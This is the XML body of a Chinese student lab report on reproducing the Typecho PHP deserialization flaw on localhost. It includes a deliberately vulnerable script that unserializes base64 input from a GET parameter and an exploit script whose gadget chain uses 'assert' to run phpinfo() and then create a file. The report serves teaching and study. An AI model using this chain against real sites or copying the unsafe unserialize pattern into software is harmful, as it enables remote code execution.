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809C7"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 w14:paraId="43D9787F"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>赵悦蛟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2313650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 xml:space="preserve">班级： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1071</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636F6D6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7C09F6FF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 w14:paraId="03116C83"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反序列化漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25552480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 w14:paraId="5F546BD4">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>复现12.2.3中的反序列化漏洞，并执行其他的系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513F7FA"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 w14:paraId="5BAB3294">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="-56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创建反序列化php文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADB40E"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新建一个typecho.Php文件，编写代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45497AB1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>/*typecho.php*/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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B33C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Typecho_Db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1DA73C35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__construct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$adapterName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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA547B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$adapterName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'Typecho_Db_Adapter_'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$adapterName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2E7521E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494B0E6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3DE7AC6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58BB303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Typecho_Feed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63367EC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$item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0649CA6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__toString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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B49FD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item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'author'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screenName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40F895D1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22FBC2E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30153405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1BE6E0F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Typecho_Request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2286696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$_params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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642874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$_filter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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D5B1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__get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</w:p>
    <w:p w14:paraId="0942F27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254E850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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2411530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53734D1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NULL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</w:p>
    <w:p w14:paraId="1A868ED8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3246EDA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true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298CA13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isset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_params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]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298DC0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_params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$key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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E72A7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6ACA120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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3CE5F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7FE33DD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03365B1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714DBAC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56641D4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is_array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&amp;&amp;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strlen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771ACB4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4A75C3F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$this-&gt;_applyFilter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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288CF9C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744773C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4EA970D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_applyFilter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</w:p>
    <w:p w14:paraId="58FCF63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4BAC009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_filter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563390B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foreach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_filter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016A770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is_array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array_map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call_user_func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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D1E7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4E68015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_filter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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BDB6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6B60EAE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5A09274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11F971E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3961549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04350127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$config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unserialize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base64_decode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$_GET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'__typecho_config'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]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3AE5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$db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Typecho_Db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$config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'adapter'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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1362E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宋体" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="494949"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B6B20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/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4701ECDD">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这段代码中设置了三个类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E6DE2">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Typecho_Db 类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A326E">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>数据库适配器类，构造函数接收一个适配器名称并拼接成完整的类名格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7E56A">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Typecho_Feed 类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F7A60">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>包含一个私有属性 </w:t>
      </w:r>
      <w:r>
        <w:t>$item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t> 和一个魔术方法 __toString。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EB857">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>__toString 方法尝试访问 $item['author']-&gt;screenName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BDDFC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Typecho_Request 类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D83AD">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>包含参数和过滤器相关的功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FED8E">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>__get 魔术方法通过 get 方法获取参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F421894">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>get 方法根据键名从 $_params 中获取值，支持默认值。_applyFilter 方法对值应用过滤器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3EDD7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>最后两行代码从 GET 参数 __typecho_config 中获取经过 Base64 编码和序列化的配置数据，反序列化为数组。使用配置中的 adapter 创建 Typecho_Db 实例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441121E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="-560" w:leftChars="0" w:firstLine="5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编写对应的利用代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE2FF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新建一个exp.Php文件，编写代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35280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>/*exp.php*/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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF3E0E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Typecho_Feed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C162E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61779EC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$item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4DDDC0C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__construct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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11746790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item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</w:p>
    <w:p w14:paraId="16F4B84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'author'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Typecho_Request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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB83D56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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F871D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2EC2B49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69E39CA5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5466378B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Typecho_Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD3BC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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A32B6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$_params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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DBD2A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private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$_filter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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC8BA1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__construct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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A734C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_params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'screenName'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'phpinfo()'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47F45EA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$this-&gt;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_filter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]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'assert'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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EEF71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2093154E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D510B4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</w:p>
    <w:p w14:paraId="76893E09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$exp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array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</w:p>
    <w:p w14:paraId="2B1AC1D2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2"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>'adapter'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76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>Typecho_Feed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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE15CF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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE2B63">
      <w:pPr>
        <w:pStyle w:val="6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2"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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94949"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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base64_encode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serialize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2"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>$exp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83A42"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>));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2"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B79B0"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/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F40E554">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>这段代码是一个反序列化漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t> PoC（Proof of Concept），用于构造恶意数据，使目标系统在反序列化时执行任意 PHP 代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DFCA8F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>1. 反序列化链入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Typecho_Feed类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFEB456">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Typecho_Feed 类是漏洞利用的入口点，其核心是通过反序列化触发恶意对象构造。该类包含一个私有属性 $item，在构造函数中将其初始化为数组，其中键 'author' 关联到 Typecho_Request 对象。当反序列化执行时，会自动调用 __construct()，完成恶意对象的初始化，为后续代码执行铺垫。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B85B3F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2. 恶意参数与过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Typecho_Request类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C959BA">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Typecho_Request 类负责存储攻击参数和危险逻辑。其构造函数中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70B1D8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$_params['screenName'] 设置为字符串 'phpinfo()'（待执行的代码）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52463E21">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>$_filter[0] 设置为函数名 'assert'（可动态执行代码）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>当反序列化后的对象被调用（如通过 __toString() 或过滤器处理），assert 会执行 $_params['screenName'] 中的代码，实现任意命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBB33E">
      <w:pPr>
        <w:bidi w:val="0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t>反序列化漏洞的触发依赖于目标系统对输入数据的处理。攻击者将构造的恶意对象序列化并Base64编码后，通过参数（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>__typecho_config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>）传递给目标。反序列化时，Typecho_Feed 和 Typecho_Request 的恶意逻辑被激活，最终通过 assert 执行 phpinfo() 或其他注入代码，导致信息泄露或系统沦陷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16195BF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="-560" w:leftChars="0" w:firstLine="5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实现反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D225AC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执行phpinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023589F"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访问URL：</w:t>
      </w:r>
      <w:r>
        <w:t>http://127.0.0.1/exp.php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获取对应的payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01844F"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980440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="局部截取_20250605_19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局部截取_20250605_192411"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect t="222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94AF"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 Pa yload 拼接到 typecho.php 的 __typecho_config 参数中，得到最终URL：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44BA7C">
      <w:pPr>
        <w:numPr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86580" cy="969010"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
            <wp:docPr id="2" name="图片 2" descr="局部截取_20250605_19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局部截取_20250605_192439"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect l="9867" r="6904" b="10968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90F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0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执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120DE678">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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访问拼接后的URL，执行phpinfo（）代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BB493">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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97444F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left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2512060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="局部截取_20250605_19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局部截取_20250605_192810"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect t="119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646">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left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执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E38699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执行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F917D9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将上述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">exp.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中要执行的代码进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，将：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667ED15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$this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>-&gt;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_params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[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'screenName'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] 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'phpinfo()'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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922501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替换成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C33E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$this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>-&gt;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_params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[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'screenName'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] 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'fopen(\'newfile.txt\', \'w\');'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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574F66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再次访问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http://127.0.0.1/exp.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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，得到新的payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039911EB"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96765" cy="1144905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="局部截取_20250605_19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局部截取_20250605_193025"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect l="9168" r="3626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6621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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">将其同样拼接到 __typecho_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数中，访问后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF44747">
      <w:pPr>
        <w:numPr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60265" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="局部截取_20250605_19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局部截取_20250605_193056"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect l="5821" t="15584" r="5736"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C839"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检查 typechp.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">后发现问题出在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Typecho_Feed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">类的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">方法中。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">中， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">方法必须返回一个字符串值。但在代码中，这个方法并没有返回任何值，因此 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">抛出了一个错误。 因此，将代码最后一句前加上 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">return , </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同时由于命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并不总是返回字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，需要进行异常处理:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5504F33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0277AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="DC4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Typecho_Feed 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{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E5A5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0277AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">private 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$item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; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CC19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0277AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">public function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="DC4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>__toString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() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D808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 xml:space="preserve">$screenName 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$this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>-&gt;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item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[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'author'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]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>-&gt;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screenName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; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794658F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0277AA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(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is_string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(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$screenName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)) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368B39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0277AA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$screenName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; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84F9E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} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0277AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">else 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{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C95D3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0277AA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'Not string!'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; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890FF1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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9B39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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF8AA3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再次重复之前的操作，进入url，成功执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197CB0B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85825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="局部截取_20250605_193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局部截取_20250605_193352"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect t="18689" b="1597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4BEA">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此时代码在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHPnow-1.5.6\htdocs 目录下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>newfile.txt 文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，表明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fopen(\'newfile.txt\', \'w\'); 被成功执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949509A">
      <w:pPr>
